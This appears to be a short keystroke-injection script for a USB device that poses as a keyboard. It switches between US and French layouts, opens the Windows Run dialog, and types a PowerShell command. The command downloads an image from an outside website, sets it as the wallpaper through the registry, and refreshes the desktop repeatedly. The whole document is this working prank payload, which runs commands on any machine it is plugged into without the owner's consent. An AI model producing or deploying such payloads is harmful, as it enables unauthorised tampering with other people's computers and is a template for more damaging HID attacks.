type('\n')
type('type(')
layout('us') 
press("3")
layout('fr')
press("GUI r");
layout('us') 
press("3")
layout('fr')
type ('$p=$home+\'\\\\b.jpg\';iwr https://initiate.alphacoders.com/images/976/cropped-2560-1440-976190.png?494 -O $p;SP \'HKCU:Control Panel\\\\Desktop\' WallPaper $p;1..59')
layout('us') 
press("RIGHT_ALT 6")
layout('fr')
type ('%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\\')
layout('us') 
press("3")
layout('fr')
type ('\\n')
layout('us') 
press("3")
layout('fr')
type (')\n')
type('\n')
